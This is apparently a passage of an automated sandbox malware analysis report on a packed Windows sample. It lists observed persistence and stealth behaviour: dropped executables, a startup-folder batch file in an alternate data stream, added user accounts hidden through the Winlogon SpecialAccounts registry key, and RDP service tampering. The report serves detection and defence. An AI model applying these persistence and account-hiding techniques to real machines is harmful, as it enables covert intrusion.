          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00408010 push ecx; ret 0_2_00408023
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0041C352 pushad ; retf 0_2_0041C359
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0041D355 push esi; ret 0_2_0041D35E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0041C33A push esp; retf 0_2_0041C351
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D11190 push eax; ret 0_2_02D111A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D11190 push eax; ret 0_2_02D111CC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00553B50
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Creates processes via WMI
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1D418 NetUserAdd,NetLocalGroupAddMembers,0_2_02D1D418
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData\images.exeJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData\images.exeJump to dropped file
          Source: C:\ProgramData\images.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW,0_2_02D127D3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,0_2_02D1A6C8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,0_2_02D1AC0A

          Boot Survival

          barindex
          Drops script or batch files to the startup folder
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior
          Source: C:\ProgramData\images.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to behavior
          Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_02D1D508

          Hooking and other Techniques for Hiding and Protection

          barindex
          Contains functionality to hide user accounts
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Hides user accounts
          Source: C:\ProgramData\images.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList GEAzbtFJump to behavior
          Creates files in alternative data streams (ADS)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
